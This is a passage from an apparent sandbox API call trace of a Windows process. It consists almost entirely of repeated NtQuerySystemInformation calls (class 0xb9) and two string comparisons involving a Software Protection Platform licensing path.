(SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x20, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x28, ResultLength=0x0) [0185.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x28, ResultLength=0x0) [0185.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x28, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x20, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x20, ResultLength=0x0) [0185.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x20, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x20, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe200, Length=0x28, ResultLength=0x0) [0185.547] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe050, Length=0x28, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x28, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x28, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x20, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x20, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc0, Length=0x20, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc0, Length=0x20, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe200, Length=0x28, ResultLength=0x0) [0185.559] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe280, Length=0x50, ResultLength=0x0) [0185.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x28, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe050, Length=0x28, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x28, ResultLength=0x0) [0185.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0d0, Length=0x28, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x20, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb0, Length=0x20, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1b0, Length=0x38, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x20, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc0, Length=0x20, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc0, Length=0x20, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd20, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd20, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd20, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x50, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x50, ResultLength=0x0) [0185.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x38, ResultLength=0x0) [0185.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x28, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x28, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x28, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x28, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0185.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x38, ResultLength=0x0) [0185.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x28, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x28, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, 